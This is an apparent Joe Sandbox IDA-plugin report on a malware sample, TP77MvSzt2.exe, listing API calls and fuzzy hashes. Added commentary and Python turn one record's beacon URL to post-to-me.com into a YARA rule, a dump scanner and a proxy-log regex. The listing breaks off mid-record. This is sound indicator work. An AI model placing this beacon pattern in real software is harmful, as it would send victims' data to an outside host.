                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free
                                                                                  • String ID:
                                                                                  • API String ID: 3170660625-0
                                                                                  • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                  • Instruction ID: 907a14777d01afdf0ef5e03384d62ffe42f7bdbb2a69a337de9d49a2900ac70f
                                                                                  • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                  • Instruction Fuzzy Hash: D1014E7620570037D3523B2C6C44D1B631DAFC2B7A7100FF8F913E2388FEA0A5014026
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                  • _free.LIBCMT ref: 00431F31
                                                                                  • _free.LIBCMT ref: 00431F59
                                                                                  • SetLastError.KERNEL32(00000000), ref: 00431F66
                                                                                  • SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free
                                                                                  • String ID:
                                                                                  • API String ID: 3170660625-0
                                                                                  • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                  • Instruction ID: 89f26f5adfa52999dd97e159cd61ed3cb5fd8874f2961931db20f525c950a72a
                                                                                  • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                  • Instruction Fuzzy Hash: 0AF02D3A50CA0037D61637356C06B5F26199FD9B67F30212FF814923F2EF6D8806412D
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                  • _free.LIBCMT ref: 04862198
                                                                                  • _free.LIBCMT ref: 048621C0
                                                                                  • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621CD
                                                                                  • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free
                                                                                  • String ID:
                                                                                  • API String ID: 3170660625-0
                                                                                  • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                  • Instruction ID: a9cef3c9b936f774d7cf7fc50f0fc743005619413a05c9790d677ce3bf8db92a
                                                                                  • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                  • Instruction Fuzzy Hash: 16F0F93514870037E291376CBC09B1A361A5BC2AAAB110FA8FD16D22D0FEA0B502452B
                                                                                  APIs
                                                                                    • Part of subcall function 0041275D: TlsGetValue.KERNEL32(?,?,00410B7B,00412C88,00000000,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412763
                                                                                  • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041796A
                                                                                    • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FFA
                                                                                    • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00421013
                                                                                    • Part of subcall function 00420FD3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421089
                                                                                    • Part of subcall function 00420FD3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421091
                                                                                  • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417978
                                                                                  • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417982
                                                                                  • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041798C
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004179AA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                  • String ID:
                                                                                  • API String ID: 4266703842-0
                                                                                  • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                  • Instruction ID: 8cd570ce40639c9f8c017ae24bf7a6ba5e4898ad5d78eaa9f9672d2de087314b
                                                                                  • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                  • Instruction Fuzzy Hash: 0BF04671A0422867CE15B7229812AEEB72A9F90718F40012FF41093283DF6C9E9986CD
                                                                                  APIs
                                                                                    • Part of subcall function 048429C4: TlsGetValue.KERNEL32(?,?,04840DE2,04842EEF,00000000,?,04840DC0,?,?,?,00000000,?,00000000), ref: 048429CA
                                                                                  • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 04847BD1
                                                                                    • Part of subcall function 0485123A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 04851261
                                                                                    • Part of subcall function 0485123A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0485127A
                                                                                    • Part of subcall function 0485123A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 048512F0
                                                                                    • Part of subcall function 0485123A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 048512F8
                                                                                  • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 04847BDF
                                                                                  • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 04847BE9
                                                                                  • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 04847BF3
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04847C11
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                  • String ID:
                                                                                  • API String ID: 4266703842-0
                                                                                  • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                  • Instruction ID: 2ec975f2db8baa9eea94217e05d21e9b6fe925cc7608c0025c2dbefc342314cb
                                                                                  • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                                                  • Instruction Fuzzy Hash: D6F0F635A0021C67DF16F77D981096EB7669FC0668B004B6AD801D3250EFA5BA4587C7
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00439E7D
                                                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                  • _free.LIBCMT ref: 00439E8F
                                                                                  • _free.LIBCMT ref: 00439EA1
                                                                                  • _free.LIBCMT ref: 00439EB3
                                                                                  • _free.LIBCMT ref: 00439EC5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                  • Instruction ID: 3df159f09b4f07c7f9cd4576f3114e9092ca915295917fe09ca5bd5d66e4921a
                                                                                  • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                  • Instruction Fuzzy Hash: 61F04F32409200ABC620EB59E483C1773D9BB08712F686A4FF04CDB751CBBAFC808A5D
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0486A0E4
                                                                                    • Part of subcall function 048636F1: HeapFree.KERNEL32(00000000,00000000,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?), ref: 04863707
                                                                                    • Part of subcall function 048636F1: GetLastError.KERNEL32(?,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?,?), ref: 04863719
                                                                                  • _free.LIBCMT ref: 0486A0F6
                                                                                  • _free.LIBCMT ref: 0486A108
                                                                                  • _free.LIBCMT ref: 0486A11A
                                                                                  • _free.LIBCMT ref: 0486A12C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                  • Instruction ID: 976c63ce94c03ac6a5e6da67ffda320cc11fb545e80229fe9ca456d480fb45ae
                                                                                  • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                  • Instruction Fuzzy Hash: 12F04F72405200AB96A4EB5CF8C2C1A73DAAA01391B640F59F40BE7710CF71F8908A5A
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 00431768
                                                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                                                  • _free.LIBCMT ref: 0043177A
                                                                                  • _free.LIBCMT ref: 0043178D
                                                                                  • _free.LIBCMT ref: 0043179E
                                                                                  • _free.LIBCMT ref: 004317AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                  • Instruction ID: 59d86e5f81b59af28f084099f89460b905b5d9e26065712495255f22da63edd4
                                                                                  • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                  • Instruction Fuzzy Hash: 01F03070C003109B9A226F25AC414553B60AF2D727F04636FF4069B273C77ADA52DF8E
                                                                                  APIs
                                                                                  • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCEF
                                                                                  • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD20
                                                                                  • GetCurrentThread.KERNEL32 ref: 0041CD29
                                                                                  • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD3C
                                                                                  • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                  • String ID:
                                                                                  • API String ID: 2583373041-0
                                                                                  • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                  • Instruction ID: c40835f97e64ecf2e035c3ed6e644cfe8c904edaac08ffe142c14ca74381b7ad
                                                                                  • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                  • Instruction Fuzzy Hash: 81F0AE762406109B8625FF11FD518F777759FC4715300051FE44B47551CF28A9C1D7A6
                                                                                  APIs
                                                                                  • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0484CF56
                                                                                  • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0484CF87
                                                                                  • GetCurrentThread.KERNEL32 ref: 0484CF90
                                                                                  • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0484CFA3
                                                                                  • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0484CFAC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
Similarity
• API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
• String ID:
• API String ID: 2583373041-0
• Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
• Instruction ID: cfd144ed808c2e3d6c60b4f5140a249f3846fc2f21e076fb45a693f08105fe85
• Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
• Instruction Fuzzy Hash: 50F0A036301A04AB8625FF28F9508BB77BAAFC46143010F4CED8786551CF65B902EB32
APIs
• _free.LIBCMT ref: 048619CF
  • Part of subcall function 048636F1: HeapFree.KERNEL32(00000000,00000000,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?), ref: 04863707
  • Part of subcall function 048636F1: GetLastError.KERNEL32(?,?,0486A37F,?,00000000,?,00000000,?,0486A623,?,00000007,?,?,0486AA17,?,?), ref: 04863719
• _free.LIBCMT ref: 048619E1
• _free.LIBCMT ref: 048619F4
• _free.LIBCMT ref: 04861A05
• _free.LIBCMT ref: 04861A16
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
• Instruction ID: 7229f8276a666e379ad75685e50424094e3f64b85154326f2850a81aa007a888
• Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
• Instruction Fuzzy Hash: C0F030B0C007119B9E616F18AC814043B61AF09662700076AF803D7372CBB4E862EB8F
APIs
• InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 04832EAE
  • Part of subcall function 04831321: _wcslen.LIBCMT ref: 04831328
  • Part of subcall function 04831321: _wcslen.LIBCMT ref: 04831344
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 048330C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: InternetOpen_wcslen
• String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
• API String ID: 3381584094-4083784958
• Opcode ID: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
• Instruction ID: 2ce2117a234a4f6b5f694319c1fd5d828cfde88ba4c9d3dafcd0bc570b98339a
• Opcode Fuzzy Hash: f722d498d47d2f0aeabff3c67fdeace8084b2a701aad829f7b28d117417d8525
• Instruction Fuzzy Hash: D6517495E65344A8E320EFB0BC52B353378EF58712F10693BE518CB2B2E7A19944875E
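The record above is the one that matters for network detection: the function in the 0x04830000 region initialises WinINet with InternetOpenW, runs two _wcslen calls (a string concatenation) and fetches a URL with InternetOpenUrlW, and its two string references are `https://post-to-me.com/track_prt.php?sub=` and `&cc=DE` (the `$` between them in the String ID line is the report's separator, not part of either string). The value placed after `sub=` is not in the report, and neither is the user agent whose pointer (00451E78) is passed to InternetOpenW, so neither should be used as an indicator. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it scans a raw memory dump for both fragments in the UTF-16LE form the W APIs require (and in ASCII as a fallback), rebuilds the beacon URL template, emits a YARA rule for the region, and filters constructed proxy log lines with a regex on the fixed host and path. The rule name, the sample dump bytes, the log lines and the choice to leave the `cc=` value open are mine, not the report's.

```python
import re

# Fragments recorded in the report's String ID for the InternetOpenW /
# InternetOpenUrlW function in the 0x04830000 region. The value of "sub=" is
# not in the report; the sample supplies it at run time.
URL_PREFIX = "https://post-to-me.com/track_prt.php?sub="
URL_SUFFIX = "&cc=DE"

def encodings(fragment):
    """Byte forms worth scanning for: the W-suffixed WinINet calls take UTF-16LE,
    but an unpacked stage may also keep the template as ASCII."""
    return {"wide": fragment.encode("utf-16-le"), "ascii": fragment.encode("ascii")}

def find_fragments(dump):
    """Return sorted (offset, encoding, fragment) tuples for every occurrence of
    either URL fragment in a raw memory dump."""
    hits = []
    for fragment in (URL_PREFIX, URL_SUFFIX):
        for enc, needle in encodings(fragment).items():
            start = 0
            while (pos := dump.find(needle, start)) != -1:
                hits.append((pos, enc, fragment))
                start = pos + 1
    return sorted(hits)

def reconstruct_template(dump):
    """Rebuild the beacon URL the way the function assembles it (two _wcslen
    calls, then concatenation): prefix + <sub value> + suffix. None if either
    fragment is missing from the dump."""
    present = {fragment for _, _, fragment in find_fragments(dump)}
    if {URL_PREFIX, URL_SUFFIX} <= present:
        return URL_PREFIX + "<sub>" + URL_SUFFIX
    return None

# Host and path are fixed by the sample; the sub value is free. Leaving cc=
# open is an assumption: the report only shows cc=DE, other builds may differ.
BEACON_RE = re.compile(r"https?://post-to-me\.com/track_prt\.php\?sub=[^&\s]*&cc=[^&\s]+")

def match_beacons(log_lines):
    """Keep the proxy/IDS URL log lines that contain the beacon."""
    return [line for line in log_lines if BEACON_RE.search(line)]

def yara_rule(name="post_to_me_track_prt_beacon"):
    """Memory/file rule on both fragments, wide and ascii. The rule name is ours."""
    return "\n".join([
        f"rule {name}",
        "{",
        "    strings:",
        f'        $u1 = "{URL_PREFIX}" wide ascii',
        f'        $u2 = "{URL_SUFFIX}" wide ascii',
        "    condition:",
        "        $u1 and $u2",
        "}",
    ])

# Constructed stand-in for the 0x04830000 dump: the two fragments as UTF-16LE,
# NUL-terminated, with filler bytes around them.
SAMPLE_DUMP = (b"\x00" * 16 + URL_PREFIX.encode("utf-16-le") + b"\x00\x00"
               + b"\x90" * 8 + URL_SUFFIX.encode("utf-16-le") + b"\x00\x00")

# Constructed proxy log lines (timestamps and the sub value are made up).
SAMPLE_LOG = [
    "t1 GET https://post-to-me.com/track_prt.php?sub=abc123&cc=DE 200",
    "t2 GET https://example.invalid/index.html 200",
    "t3 GET https://post-to-me.com/other.php?sub=abc123&cc=DE 404",
]

if __name__ == "__main__":
    print(reconstruct_template(SAMPLE_DUMP))
    print(yara_rule())
    print(match_beacons(SAMPLE_LOG))
```

Run it against the real `.sdmp` by reading the file as bytes and passing it to `reconstruct_template`; the offsets returned by `find_fragments` are relative to the dump's base (0x04830000 here), which is what you need to cross-check against the `ref:` addresses in the record.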
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TP77MvSzt2.exe,00000104), ref: 0042F773
• _free.LIBCMT ref: 0042F83E
• _free.LIBCMT ref: 0042F848
Strings
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\TP77MvSzt2.exe
• API String ID: 2506810119-2945471316
• Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
• Instruction ID: 2f2bce9173a2d2ca0187e045b48802aae097e8e7c4f0e2c97b909a8c245fc2df
• Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
• Instruction Fuzzy Hash: 47319371B00228ABDB21EF99AC8189FBBFCEF95314B90407BE80497211D7749E45CB59
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TP77MvSzt2.exe,00000104), ref: 0485F9DA
• _free.LIBCMT ref: 0485FAA5
• _free.LIBCMT ref: 0485FAAF
Strings
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\TP77MvSzt2.exe
• API String ID: 2506810119-2945471316
• Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
• Instruction ID: d018937cadfcb1c3da1bcb078f73801defd8d5085eb9384552afb4c02a029d30
• Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
• Instruction Fuzzy Hash: C3317B71E00258EFDB22DF99DC84D9EBBFCEF85718B104666EE05D7221D6B0AA40C751
APIs
• Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 04853071
  • Part of subcall function 04848AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 04848ADD
• SafeSQueue.LIBCONCRT ref: 0485308A
• Concurrency::location::_Assign.LIBCMT ref: 0485314A
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0485316B
• __CxxThrowException@8.LIBVCRUNTIME ref: 04853179
Strings
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
• String ID: 11@
• API String ID: 3496964030-1785270423
• Opcode ID: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
• Instruction ID: 0572d8f89fad9ddc82c35ef07715435091a2d7c698ba2e03d7703522eea2c10e
• Opcode Fuzzy Hash: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
• Instruction Fuzzy Hash: 3921C5357006059FDF16BF78C890A6D7BA1AF85354F044A99ED46CB362DB70F805CB92
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,048621E4), ref: 0485E220
• GetLastError.KERNEL32(00457910,00000010,00000003,048621E4), ref: 0485E25A
• RtlExitUserThread.NTDLL(00000000), ref: 0485E261
Strings
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: ErrorExitFeatureLastPresentProcessorThreadUser
• String ID: 11@
• API String ID: 1079102050-1785270423
• Opcode ID: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
• Instruction ID: 68cfbcaf487af696c4038f1a9be86378848a49230e6f0e356916c90781512af2
• Opcode Fuzzy Hash: 8b5411bbe6c94bee456d29a8542aa325eb684c89ca07275a9873d682f3d1ed15
• Instruction Fuzzy Hash: 19112770640305AAFB05BB74AC0AB7D3764AF05B09F100F58FD02EB2E1DBE1B6008666
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,048621E4), ref: 0485E220
• GetLastError.KERNEL32(00457910,00000010,00000003,048621E4), ref: 0485E25A
• RtlExitUserThread.NTDLL(00000000), ref: 0485E261
Strings
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: ErrorExitFeatureLastPresentProcessorThreadUser
• String ID: 11@
• API String ID: 1079102050-1785270423
• Opcode ID: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
• Instruction ID: 104da139935bb6726ce306d36fdca1346aaf0c83f5d1d9a079e444959a0f38a2
• Opcode Fuzzy Hash: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
• Instruction Fuzzy Hash: ED110670640304AAFB05BB74AC0AB7D3761AF05B09F100F58FD06EB2E1DBE1BA019666
APIs
• SetLastError.KERNEL32(0000000D,?,0040DE66,0040C67E,?,?,00000000,?,0040C54E,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,0040C67E), ref: 0040EFCF
Strings
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID: ErrorLast
• String ID: 11@$f(@
• API String ID: 1452528299-1277599000
• Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
• Instruction ID: 215b6f0c2c260135b977075f1765c75d61afaaca07cd8a2d2b7a33b83608daf3
• Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
• Instruction Fuzzy Hash: 24110236204117BFCF125F62DC4456BBB65FF08712B14443AF905AB290DA749820ABD5
APIs
• Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00425F2D
  • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F17
  • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F2C
• Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00425F60
• Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00425F8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
• String ID: 11@
• API String ID: 2684344702-1785270423
• Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
• Instruction ID: cb3a2859ed7aecbb53c8f7ff5db8590c6937c5e0b26f296ff23853c6e0f13c92
• Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
• Instruction Fuzzy Hash: CB01DB35700629ABCF01DF54D5808AE77B9EF89354B55006AEC06DB301DA34DE05DB60
APIs
• Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 04856194
